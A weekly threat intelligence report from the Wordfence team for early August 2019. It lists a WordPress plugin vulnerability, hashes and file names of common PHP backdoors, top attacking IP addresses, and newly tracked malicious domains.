Wordfence Weekly July 31 2019 – August 06 2019

A weekly report of noteworthy threat data by the Defiant threat intelligence team.

Notable Vulnerabilities

Name: Woody Ad Snippets <= 2.2.4 - Multiple Vulnerabilities
Description: Attackers can import plugin settings, leading to XSS and possible RCE.
Type: A5 – Broken Access Control

Most Common New Infections

Malware samples identified on the greatest count of newly infected sites.

MD5 Signature Description Example File Names
C62180F0D626D92E29E83778605DD8BE Suspicious:PHP/eval_exit.92 Obfuscated PHP backdoor. file.php, i.php, ihqxkhi.php, and others.
048648D9755220E727E7E0178837F7BF Backdoor:PHP/561C.110 PHP script which generates and executes a malicious binary. amp3.php, sib.php, wpfunck.php, and others.
8C9E8184A1523C7286FC11E7DE2EAC55 Backdoor:PHP/2842.103 PHP script which generates and executes a malicious binary. wp_form7.php
BF3A65A77DA363AC779A2C45FD2DA2FF Suspicious:PHP/eval_exit.92 Obfuscated PHP backdoor. common_config.php
446ABEFA504998F144A7AE906A173978 Suspicious:PHP/rot13_of_eval.95 Obfuscated, password-protected PHP backdoor. b9448c1c.php

IPs Attacking Most Sites

Rank Prev. IP Address ASN Country
1 145.239.31.0 16276 (OVH SAS) Poland PL
2 96.44.141.102 8100 (QuadraNet Enterprises LLC) United States US
3 66.212.31.198 8100 (QuadraNet Enterprises LLC) United States US
4 72.11.140.155 8100 (QuadraNet Enterprises LLC) United States US
5 72.11.140.134 8100 (QuadraNet Enterprises LLC) United States US
6 72.11.141.126 8100 (QuadraNet Enterprises LLC) United States US
7 96.44.140.110 8100 (QuadraNet Enterprises LLC) United States US
8 72.11.141.54 8100 (QuadraNet Enterprises LLC) United States US
9 3 5.8.47.2 50896 (Trusov Ilya Igorevych) Poland PL
10 2 35.226.130.240 15169 (Google LLC) United States US

New Tracked Domains

Domain Name Date Added Current Status Notes
psarips.net 08/05/2019 Up Torrent site associated with malicious samples.
nulledhub.net 08/05/2019 Up Nulled WordPress addon site associated with malicious samples.
joomlalock.com 08/05/2019 Up Nulled Joomla addon site associated with malicious samples.
apkmod1.com 08/05/2019 Up APK download site associated with malicious samples.

Subscribe To The Wordfence Weekly



Did you enjoy this post? Share it!

Recent Issues

Archive